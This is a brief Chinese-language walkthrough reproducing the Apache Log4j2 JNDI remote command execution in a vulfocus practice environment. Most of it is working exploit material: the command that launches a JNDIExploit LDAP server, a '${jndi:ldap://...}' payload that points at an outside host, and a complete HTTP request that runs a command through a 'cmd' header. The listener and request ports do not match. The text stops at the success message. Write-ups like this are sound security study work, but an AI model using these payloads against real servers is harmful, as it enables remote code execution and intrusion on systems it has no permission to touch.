Apache Log4j2远程命令执行复现

Apache Log4j2远程命令执行复现

启动靶场环境

直接用vulfocus启一个环境。
官网地址：http://vulfocus.fofa.so/

用JNDIExploit启一个ldap的服务

java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 32703 -p 32701 -i 0.0.0.0

发包

payload更改如下：

payload=${jndi:ldap://xxx.xxx.xxx.xxx:32703/TomcatBypass/TomcatEcho}

数据包如下：（在请求头中添加cmd字段，后面跟上需要执行的命令即可。）

POST /hello  HTTP/1.1
Host: vulfocus.fofa.so:41624
Content-Type: application/x-www-form-urlencoded
cmd: whoami
Content-Length: 47

payload=${jndi:ldap://xxx.xxx.xxx.xxx:30703/TomcatBypass/TomcatEcho}

注意Content-Type的类型为：application/x-www-form-urlencoded

成功回显命令：